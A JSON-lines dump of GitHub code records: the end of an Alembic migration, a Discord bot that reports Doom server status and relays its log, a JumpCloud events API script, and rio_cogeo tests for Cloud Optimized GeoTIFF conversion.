nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('tipologie',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('tipologia', sa.String(length=100), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('personaggi',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('nome', sa.String(length=64), nullable=True),\n sa.Column('quantita', sa.Integer(), nullable=True),\n sa.Column('tipologia_id', sa.Integer(), nullable=True),\n sa.Column('allineamento_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['allineamento_id'], ['allineamenti.id'], ),\n sa.ForeignKeyConstraint(['tipologia_id'], ['tipologie.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('nome')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('personaggi')\n op.drop_table('tipologie')\n op.drop_table('allineamenti')\n # ### end Alembic commands ###\n","repo_name":"lucamarino07/lupus_project","sub_path":"migrations/versions/29d15d666661_qq.py","file_name":"29d15d666661_qq.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44296270451","text":"import sys\nimport os\nimport subprocess\nimport threading\nimport time\nimport asyncio\nimport datetime\nimport random\nimport pyinotify\n\nimport discord\n\nfrom doom_monitor import T_DoomMonitor\nfrom collections import deque\n\nOWNER_ID = ''\nBOT_TOKEN = ''\n\ndef command(admin_only=False, **m_kwargs):\n def wrap(func):\n async def deco(bot, message, *args, **kwargs):\n if deco.admin_only and not message.author.server_permissions.administrator:\n chk1 = not message.author.server_permissions.administrator\n chk2 = not message.author.id == OWNER_ID\n if chk1 and chk2:\n return\n if message.channel.is_private:\n return\n\n await func(bot, message, *args, **kwargs)\n\n setattr(deco, 'admin_only', admin_only)\n\n for k in m_kwargs:\n setattr(deco, k, m_kwargs[k])\n\n return deco\n return wrap\n\n@command()\nasync def help(bot, message, **kwargs):\n cmds = 'USER COMMANDS:\\n'\n cmds_admin = '\\nADMIN COMMANDS:\\n'\n for cmd in bot.commands:\n w = ''\n try:\n h = getattr(bot.commands[cmd], 'help_str')\n except:\n h = ''\n if bot.commands[cmd].admin_only:\n cmds_admin += (bot.command_prefix + cmd + ' ' + h + w + '\\n')\n else:\n cmds += (bot.command_prefix + cmd + ' ' + h + w + '\\n')\n await bot.send_message(message.channel, '```' + cmds + cmds_admin + '```')\n\n@command(admin_only=True, allow_whitelist=False, help_str='<single char>')\nasync def prefix(bot, message, split_text=[''], **kwargs):\n try:\n if len(split_text[1]) > 1:\n raise IndexError\n bot.command_prefix = split_text[1]\n except IndexError:\n await bot.send_message(message.channel, 'Invalid arguments. Proper usage: {}prefix <single char>'.format(bot.command_prefix))\n except ValueError:\n await bot.send_message(message.channel, 'Invalid arguments. Choose a different character')\n else:\n await bot.send_message(message.channel, 'Bot command prefix changed to {}'.format(bot.command_prefix))\n\n@command()\nasync def doom(bot, message, **kwargs):\n if len(bot.reader.players) < 1:\n pnames = 'No players connected.'\n else:\n pnames = 'Players connected: ' + ', '.join([pname for pname in bot.reader.players])\n\n with open('./config/hostname.cfg', 'r') as f:\n line = f.readline()\n server_info = line[line.find(' ')+2:-2]\n\n s = '**{0}** `{1}`\\n{2}'.format(bot.server_ip, server_info, pnames)\n await bot.send_message(message.channel, s)\n\nclass DoomBot(discord.Client):\n\n def __init__(self, owner_id, bot_token):\n super().__init__(max_messages=100)\n\n self.owner = owner_id\n self.token = bot_token\n\n self.command_prefix = '!'\n\n self.commands = {}\n self.commands['help'] = help\n self.commands['prefix'] = prefix\n self.commands['doom'] = doom\n\n self.server_ip = '127.0.0.1:10666'\n self.doom_channel_id = ''\n self.doom_channel = discord.Object(id=self.doom_channel_id)\n self.reader = None\n\n def run(self):\n super().run(self.token)\n\n self.loop.create_task(self.listen_for_server())\n\n async def on_ready(self):\n print('Bot logged in successfully. ' + datetime.datetime.now().strftime(\"%H:%M %m-%d-%Y\"))\n print(self.user.name)\n print(self.user.id)\n\n async def on_message(self, message):\n if message.content and message.content[0] == self.command_prefix:\n content = message.content.split(' ')\n if content[0][1:] in self.commands:\n await self.commands[content[0][1:]](self, message, split_text=content)\n\n def get_logger_pid(self):\n proc = subprocess.Popen('./utils/get_logger_pid.sh',\n stdout=subprocess.PIPE)\n\n out, _ = proc.communicate(timeout=5)\n PID = out.decode('ascii').strip()\n if proc.poll() is None:\n proc.kill()\n\n if PID.isspace() or not PID.isdigit():\n return None\n else:\n return PID\n\n async def listen_for_server(self, wait_time=10):\n PID = self.get_logger_pid()\n while not PID:\n await asyncio.sleep(wait_time)\n PID = self.get_logger_pid()\n\n if self.reader is None:\n self.loop.create_task(self.monitor_server(PID))\n\n async def monitor_server(PID, wait_time=1):\n cmd = ['tail', '-f', '-n', '1', '--pid={}'.format(PID), '/proc/{}/fd/1'.format(PID)]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n\n out_q = deque()\n self.reader = T_DoomMonitor(proc.stdout, out_q, interval=wait_time)\n self.reader.start()\n\n try:\n while not self.reader.eof():\n while out_q:\n line = out_q.popleft()\n if self.doom_channel.id != '':\n await self.send_message(self.doom_channel, line)\n\n if not proc.poll() is None and self.reader.is_alive():\n self.reader.stop_monitoring()\n\n await asyncio.sleep(wait_time)\n finally:\n if self.reader.is_alive() and not self.reader.abort:\n self.reader.stop_monitoring()\n\n self.reader.join()\n proc.stdout.close()\n if proc.poll() is None:\n proc.kill()\n\n self.reader = None\n self.loop.create_task(self.listen_for_server())\n\nif __name__ == '__main__':\n cl = DoomBot(OWNER_ID, BOT_TOKEN)\n\n cl.run()\n","repo_name":"mzaneski/doom-stuff","sub_path":"doombot.py","file_name":"doombot.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11335001141","text":"import requests\nimport datetime\nimport os\n\nurl = \"https://events.jumpcloud.com/events\"\n\ndt = datetime.datetime.today()\ndt2 =dt - datetime.timedelta(days=7)\n\nend= \"{0:%Y-%m-%dT%H:%M:%SZ}\".format(dt)\nstart=\"{0:%Y-%m-%dT%H:%M:%SZ}\".format(dt2)\n\npayload = 'startDate=' + start + '&' + 'endDate' +end\nheaders = {\n 'x-api-key': os.environ[\"JCAPI\"],\n 'content-type': \"application/json\",\n }\n\nresponse = requests.request(\"GET\", url, params=payload, headers=headers)\n\nprint(response.text)\n","repo_name":"samuraidays/jumpcloud-events-get","sub_path":"jumpcloud_events.py","file_name":"jumpcloud_events.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73129459208","text":"\"\"\"tests rio_cogeo.cogeo.\"\"\"\n\nimport os\nimport pathlib\n\nimport numpy\nimport pytest\nimport rasterio\nfrom rasterio.enums import ColorInterp\nfrom rasterio.io import MemoryFile\nfrom rasterio.shutil import copy\nfrom rasterio.vrt import WarpedVRT\n\nfrom rio_cogeo.cogeo import TemporaryRasterFile, cog_info, cog_translate, cog_validate\nfrom rio_cogeo.errors import IncompatibleOptions\nfrom rio_cogeo.profiles import cog_profiles\nfrom rio_cogeo.utils import has_alpha_band, has_mask_band\n\nfrom .conftest import requires_gdal31, requires_webp\n\nFIXTURES_DIR = os.path.join(os.path.dirname(__file__), \"fixtures\")\nraster_path_rgba = os.path.join(FIXTURES_DIR, \"image_rgba.tif\")\nraster_path_rgb = os.path.join(FIXTURES_DIR, \"image_rgb.tif\")\nraster_path_nan = os.path.join(FIXTURES_DIR, \"image_nan.tif\")\nraster_path_nodata = os.path.join(FIXTURES_DIR, \"image_nodata.tif\")\nraster_path_float = os.path.join(FIXTURES_DIR, \"image_float.tif\")\nraster_path_missingnodata = os.path.join(FIXTURES_DIR, \"image_missing_nodata.tif\")\nraster_path_tags = os.path.join(FIXTURES_DIR, \"image_tags.tif\")\nraster_path_mask = os.path.join(FIXTURES_DIR, \"image_rgb_mask.tif\")\nraster_path_small = os.path.join(FIXTURES_DIR, \"image_171px.tif\")\nraster_path_toosmall = os.path.join(FIXTURES_DIR, \"image_51px.tif\")\nraster_path_offsets = os.path.join(FIXTURES_DIR, \"image_with_offsets.tif\")\nraster_colormap = os.path.join(FIXTURES_DIR, \"image_colormap.tif\")\nraster_nocolormap = os.path.join(FIXTURES_DIR, \"image_nocolormap.tif\")\nraster_badoutputsize = os.path.join(FIXTURES_DIR, \"bad_output_vrt.tif\")\nraster_web_z5_z11 = os.path.join(FIXTURES_DIR, \"image_web_z5_z11.tif\")\nraster_band_tags = os.path.join(FIXTURES_DIR, \"cog_band_tags.tif\")\nraster_ns_meta = os.path.join(FIXTURES_DIR, \"dataset_namespace_metadata.tif\")\n\njpeg_profile = cog_profiles.get(\"jpeg\")\njpeg_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\nwebp_profile = cog_profiles.get(\"webp\")\nwebp_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\ndeflate_profile = cog_profiles.get(\"deflate\")\ndeflate_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\nraw_profile = cog_profiles.get(\"raw\")\nraw_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\ndefault_profile = cog_profiles.get(\"raw\")\n\n\n@pytest.fixture(autouse=True)\ndef testing_env_var(monkeypatch):\n \"\"\"Set GDAL env.\"\"\"\n monkeypatch.setenv(\"GDAL_DISABLE_READDIR_ON_OPEN\", \"TRUE\")\n monkeypatch.setenv(\"GDAL_TIFF_INTERNAL_MASK\", \"TRUE\")\n monkeypatch.setenv(\"GDAL_TIFF_OVR_BLOCKSIZE\", \"64\")\n\n\ndef _validate_translated_rgb_jpeg(src):\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.profile[\"blockxsize\"] == 64\n assert src.profile[\"blockysize\"] == 64\n assert src.compression.value == \"JPEG\"\n assert src.photometric.value == \"YCbCr\"\n assert src.interleaving.value == \"PIXEL\"\n assert src.overviews(1) == [2, 4, 8]\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert not has_mask_band(src)\n\n\ndef test_cog_translate_valid(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, add_mask=True, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert has_mask_band(src)\n with rasterio.open(\"cogeo.tif\", OVERVIEW_LEVEL=1) as src:\n assert src.block_shapes[0] == (64, 64)\n with rasterio.open(raster_path_rgb) as src:\n with rasterio.open(\"cogeo.tif\") as dst:\n assert src.colorinterp == dst.colorinterp\n\n\ndef test_cog_translate_NodataLossyWarning(runner):\n \"\"\"Should work as expected (create cogeo file but warns about mask creation).\"\"\"\n with runner.isolated_filesystem():\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, nodata=0, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert not src.nodata\n assert src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n\ndef test_cog_translate_NodataMask(runner):\n \"\"\"Should work as expected (create cogeo and translate nodata to mask).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_path_missingnodata,\n \"cogeo.tif\",\n deflate_profile,\n nodata=-9999,\n add_mask=True,\n quiet=True,\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.nodata is None\n assert has_mask_band(src)\n assert not src.dataset_mask().all()\n\n\ndef test_cog_translate_validRaw(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", raw_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.is_tiled\n assert not src.compression\n assert src.interleaving.value == \"PIXEL\"\n\n\ndef test_cog_translate_validIndexes(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=1, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=[1], quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n\n@requires_webp\ndef test_cog_translate_validAlpha(runner):\n \"\"\"Should work as expected (create cogeo file with alpha band).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgba, \"cogeo.tif\", webp_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.compression.value == \"WEBP\"\n assert has_alpha_band(src)\n\n with rasterio.open(raster_path_rgba) as src:\n with rasterio.open(\"cogeo.tif\") as dst:\n assert src.colorinterp == dst.colorinterp\n\n with pytest.warns(UserWarning):\n cog_translate(raster_path_rgba, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 3\n\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgba,\n \"cogeo.tif\",\n jpeg_profile,\n indexes=(1, 2, 3, 4),\n quiet=True,\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 3\n assert src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgba, \"cogeo.tif\", jpeg_profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n assert src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n\ndef test_cog_translate_valiNodataNan(runner):\n \"\"\"Should work as expected and create mask from NaN.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_nan, \"cogeo_nan.tif\", raw_profile, quiet=True)\n with rasterio.open(\"cogeo_nan.tif\") as src:\n assert src.meta[\"dtype\"] == \"float64\"\n assert src.nodata\n assert not src.dataset_mask().all()\n\n cog_translate(\n raster_path_float,\n \"cogeo_nan.tif\",\n raw_profile,\n nodata=numpy.nan,\n quiet=True,\n )\n with rasterio.open(\"cogeo_nan.tif\") as src:\n assert src.meta[\"dtype\"] == \"float64\"\n assert src.nodata\n assert not src.dataset_mask().all()\n\n\ndef test_cog_translate_validOverviews(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, overview_level=2, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.overviews(1) == [2, 4]\n\n\ndef test_cog_translate_valiEnv(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n config = {\"GDAL_TIFF_INTERNAL_MASK\": False}\n cog_translate(\n raster_path_rgba,\n \"cogeo_env.tif\",\n jpeg_profile,\n indexes=[1, 2, 3],\n add_mask=True,\n config=config,\n quiet=True,\n )\n with rasterio.open(\"cogeo_env.tif\") as src:\n assert \"cogeo_env.tif.msk\" in src.files\n\n\ndef test_cog_translate_validCustom(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n config = {\"GDAL_TIFF_OVR_BLOCKSIZE\": 256}\n profile = jpeg_profile.copy()\n profile.update({\"blockxsize\": 256, \"blockysize\": 256})\n cog_translate(\n raster_path_rgb, \"cogeo_env.tif\", profile, config=config, quiet=True\n )\n with rasterio.open(\"cogeo_env.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.compression.value == \"JPEG\"\n assert src.profile[\"blockxsize\"] == 256\n assert src.profile[\"blockysize\"] == 256\n assert src.photometric.value == \"YCbCr\"\n assert src.interleaving.value == \"PIXEL\"\n assert src.overviews(1) == [2]\n\n\ndef test_cog_translate_mask(runner):\n \"\"\"Should work as expected (copy mask from input).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_mask, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert has_mask_band(src)\n\n\ndef test_cog_translate_tags(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_tags, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"DatasetName\"] == \"my useful dataset\"\n assert src.descriptions[0] == \"first band\"\n assert src.descriptions[1] == \"second band\"\n assert src.descriptions[2] == \"third band\"\n\n cog_translate(\n raster_path_tags,\n \"cogeo.tif\",\n jpeg_profile,\n quiet=True,\n additional_cog_metadata={\"comment\": \"it should work\"},\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"comment\"] == \"it should work\"\n\n cog_translate(\n raster_path_tags, \"cogeo.tif\", raw_profile, indexes=[2], quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"DatasetName\"] == \"my useful dataset\"\n assert src.descriptions[0] == \"second band\"\n\n\ndef test_cog_translate_valid_blocksize(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n d = default_profile.copy()\n d.update({\"blockxsize\": 128, \"blockysize\": 128})\n cog_translate(raster_path_small, \"cogeo.tif\", d, quiet=True)\n assert cog_validate(\"cogeo.tif\")\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 171\n assert src.width == 171\n assert src.is_tiled\n assert src.profile[\"blockxsize\"] == 128\n assert src.profile[\"blockysize\"] == 128\n assert src.overviews(1) == [2]\n\n cog_translate(raster_path_toosmall, \"cogeo.tif\", default_profile, quiet=True)\n assert cog_validate(\"cogeo.tif\")\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 51\n assert src.width == 51\n assert src.is_tiled\n assert src.profile.get(\"blockxsize\") == 512\n assert src.profile.get(\"blockysize\") == 512\n assert not src.overviews(1)\n\n\ndef test_cog_translate_dataset(runner):\n \"\"\"Should work as expected (create cogeo from an open dataset).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as src_dst:\n cog_translate(src_dst, \"cogeo.tif\", jpeg_profile, quiet=True)\n assert not src_dst.closed\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_memfile(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n data = dataset.read()\n with MemoryFile() as memfile:\n with memfile.open(**dataset.profile) as mem:\n mem.write(data)\n cog_translate(mem, \"cogeo.tif\", jpeg_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_to_memfile(runner):\n \"\"\"Create COG in memory and using in memory or in disk temp files.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n with MemoryFile() as memfile:\n cog_translate(dataset, memfile.name, deflate_profile, quiet=True)\n with memfile.open() as src:\n assert src.width == dataset.width\n\n with rasterio.open(raster_path_rgb) as dataset:\n with MemoryFile() as memfile:\n cog_translate(\n dataset, memfile.name, deflate_profile, in_memory=False, quiet=True\n )\n with memfile.open() as src:\n assert src.width == dataset.width\n\n\ndef test_cog_translate_warpedvrt(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n with WarpedVRT(dataset) as vrt:\n cog_translate(vrt, \"cogeo.tif\", jpeg_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_forward_tags(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n data = dataset.read()\n with MemoryFile() as memfile:\n with memfile.open(**dataset.profile) as mem:\n mem.write(data)\n mem.update_tags(1, jqt=\"dre\")\n cog_translate(\n mem,\n \"cogeo.tif\",\n jpeg_profile,\n forward_band_tags=True,\n quiet=True,\n )\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n assert src.tags(1) == {\"jqt\": \"dre\"}\n\n\ndef test_cog_translate_oneBandJpeg(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n profile = jpeg_profile.copy()\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.compression.value == \"JPEG\"\n assert src.colorinterp[0] == rasterio.enums.ColorInterp.gray\n\n\ndef test_cog_translate_forward_scales(runner):\n \"\"\"Scales and Offset should be passed to the output file.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_offsets) as dataset:\n offs = dataset.offsets\n scls = dataset.scales\n cog_translate(\n dataset,\n \"cogeo.tif\",\n deflate_profile,\n forward_band_tags=True,\n quiet=True,\n )\n\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.scales == scls\n assert src.offsets == offs\n\n\ndef test_cog_translate_forward_cmap(runner):\n \"\"\"Colormap should be passed to the output file.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_colormap) as dataset:\n cog_translate(dataset, \"cogeo.tif\", deflate_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1) == dataset.colormap(1)\n assert cog.colorinterp == dataset.colorinterp\n\n # add an external colormap\n cmap = {0: (0, 0, 0, 0), 1: (1, 2, 3, 255)}\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(\n dataset, \"cogeo.tif\", deflate_profile, quiet=True, colormap=cmap\n )\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1)[1] == cmap[1]\n assert cog.colorinterp == (ColorInterp.palette,)\n\n with pytest.raises(IncompatibleOptions):\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(\n dataset,\n \"cogeo.tif\",\n deflate_profile,\n quiet=True,\n colormap=cmap,\n indexes=(1, 1, 1),\n )\n\n # add an external colormap (warns of wrong colorinterp)\n with pytest.warns(UserWarning):\n with rasterio.open(raster_path_rgb) as dataset:\n cog_translate(\n dataset,\n \"cogeo.tif\",\n deflate_profile,\n quiet=True,\n colormap=cmap,\n indexes=(1,),\n )\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1)[1] == cmap[1]\n assert cog.colorinterp == (ColorInterp.palette,)\n assert not cog.colorinterp[0] == dataset.colorinterp[0]\n\n # Input dataset has colorinterp set to `Palette` but no colormap\n with pytest.warns(UserWarning):\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(dataset, \"cogeo.tif\", deflate_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colorinterp == dataset.colorinterp\n\n\ndef test_output_size(runner):\n \"\"\"Validate fix for #140.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_badoutputsize) as src_dst:\n with MemoryFile() as memfile:\n cog_translate(src_dst, memfile.name, deflate_profile, quiet=True)\n with memfile.open() as dataset:\n assert src_dst.width == dataset.width\n assert src_dst.height == dataset.height\n\n\ndef test_cog_info():\n \"\"\"Test COGEO info.\"\"\"\n info = cog_info(raster_web_z5_z11)\n assert info.COG\n assert info.GEO.CRS == \"EPSG:3857\"\n assert info.GEO.MinZoom == 5\n assert info.GEO.MaxZoom == 11\n assert len(info.IFD) == 6\n assert info.Tags[\"Image Metadata\"]\n assert info.Tags[\"Image Structure\"]\n\n\ndef test_cog_info_dict_access():\n \"\"\"Test dictionary access to COGEO info.\"\"\"\n info = cog_info(raster_web_z5_z11)\n assert info[\"COG\"]\n assert info[\"GEO\"][\"CRS\"] == \"EPSG:3857\"\n assert info[\"GEO\"][\"MinZoom\"] == 5\n assert info[\"GEO\"][\"MaxZoom\"] == 11\n assert len(info[\"IFD\"]) == 6\n assert info[\"Tags\"][\"Image Metadata\"]\n assert info[\"Tags\"][\"Image Structure\"]\n\n\n@pytest.mark.parametrize(\n \"fname,is_local\",\n [\n (\n raster_path_rgba,\n True,\n ),\n (pathlib.Path(raster_path_rgba), True),\n (\"s3://abucket/adirectory/afile.tif\", False),\n (\"https://ahost/adirectory/afile.tif\", False),\n ],\n)\ndef test_temporaryRaster(fname, is_local, runner):\n \"\"\"Test TemporaryRasterFile class with vsi and pathlib.\"\"\"\n with runner.isolated_filesystem() as iso:\n with TemporaryRasterFile(fname) as f:\n assert (\n pathlib.Path(fname).parent == pathlib.Path(f.name).parent\n ) == is_local\n assert (pathlib.Path(iso).parent == pathlib.Path(f.name).parent) != is_local\n pass\n assert not os.path.exists(f.name)\n\n\n@requires_gdal31\n@pytest.mark.parametrize(\n \"src_path\",\n [\n raster_path_rgba,\n raster_path_rgb,\n raster_path_nan,\n raster_path_nodata,\n raster_path_float,\n ],\n)\ndef test_gdal_cog(src_path, runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n src_path,\n \"cogeo.tif\",\n cog_profiles.get(\"raw\"),\n quiet=True,\n use_cog_driver=True,\n )\n assert cog_validate(\"cogeo.tif\")\n\n\n@requires_gdal31\ndef test_gdal_cog_compare(runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n profile = cog_profiles.get(\"jpeg\")\n profile[\"blockxsize\"] = 256\n profile[\"blockysize\"] = 256\n\n # rio cogeo GDAL COG\n cog_translate(\n raster_path_rgba,\n \"gdalcogeo.tif\",\n profile.copy(),\n quiet=True,\n use_cog_driver=True,\n )\n\n # pure COG\n copy(raster_path_rgba, \"cog.tif\", driver=\"COG\", blocksize=256, compress=\"JPEG\")\n\n # rio cogeo cog\n cog_translate(\n raster_path_rgba,\n \"riocogeo.tif\",\n profile.copy(),\n indexes=(\n 1,\n 2,\n 3,\n ),\n add_mask=True,\n quiet=True,\n )\n\n with rasterio.open(\"riocogeo.tif\") as riocogeo, rasterio.open(\n \"gdalcogeo.tif\"\n ) as gdalcogeo, rasterio.open(\"cog.tif\") as cog:\n assert cog.profile == gdalcogeo.profile == riocogeo.profile\n assert cog.overviews(1) == gdalcogeo.overviews(1) == riocogeo.overviews(1)\n\n\n@requires_gdal31\ndef test_gdal_cog_compareWeb(runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n profile = cog_profiles.get(\"jpeg\")\n profile[\"blockxsize\"] = 256\n profile[\"blockysize\"] = 256\n\n # rio cogeo GDAL COG\n cog_translate(\n raster_path_rgba,\n \"gdalcogeo.tif\",\n profile.copy(),\n quiet=True,\n use_cog_driver=True,\n web_optimized=True,\n aligned_levels=1,\n )\n\n # pure COG\n copy(\n raster_path_rgba,\n \"cog.tif\",\n driver=\"COG\",\n blocksize=256,\n compress=\"JPEG\",\n TILING_SCHEME=\"GoogleMapsCompatible\",\n TILING_SCHEME_ALIGNED_LEVELS=\"2\",\n )\n\n with rasterio.open(\"gdalcogeo.tif\") as gdalcogeo, rasterio.open(\n \"cog.tif\"\n ) as cog:\n cog_meta = cog.meta\n _ = cog_meta.pop(\"transform\")\n\n gdal_meta = gdalcogeo.meta\n _ = gdal_meta.pop(\"transform\")\n\n assert cog_meta == gdal_meta\n # there are sub-centimeter difference in the affine transform so we round\n # the bounds\n for xc, yc in zip(cog.bounds, gdalcogeo.bounds):\n assert round(xc, 5) == round(yc, 5)\n\n\n@requires_gdal31\ndef test_gdal_cog_web_mask(runner):\n \"\"\"Raise a warning for specific mask/compression/web combination.\"\"\"\n with runner.isolated_filesystem():\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb,\n \"cogeo.tif\",\n cog_profiles.get(\"deflate\"),\n use_cog_driver=True,\n web_optimized=True,\n add_mask=True,\n quiet=True,\n )\n assert cog_validate(\"cogeo.tif\")\n\n\ndef test_info_with_metadata():\n \"\"\"Make sure info returns band metadata.\"\"\"\n info = cog_info(raster_band_tags)\n assert info.Band_Metadata\n assert info.model_dump(by_alias=True)[\"Band Metadata\"]\n assert info.Band_Metadata[\"Band 1\"].Description == \"Green\"\n assert info.Band_Metadata[\"Band 1\"].Metadata\n\n\ndef test_cog_translate_forward_ns_metadata(runner):\n \"\"\"Forward namespace metadata.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_ns_meta,\n \"cogeo.tif\",\n deflate_profile,\n config={\"GDAL_DISABLE_READDIR_ON_OPEN\": \"FALSE\"},\n quiet=True,\n )\n\n with rasterio.Env(GDAL_DISABLE_READDIR_ON_OPEN=\"FALSE\"):\n with rasterio.open(\"cogeo.tif\") as src:\n assert \"IMD\" not in 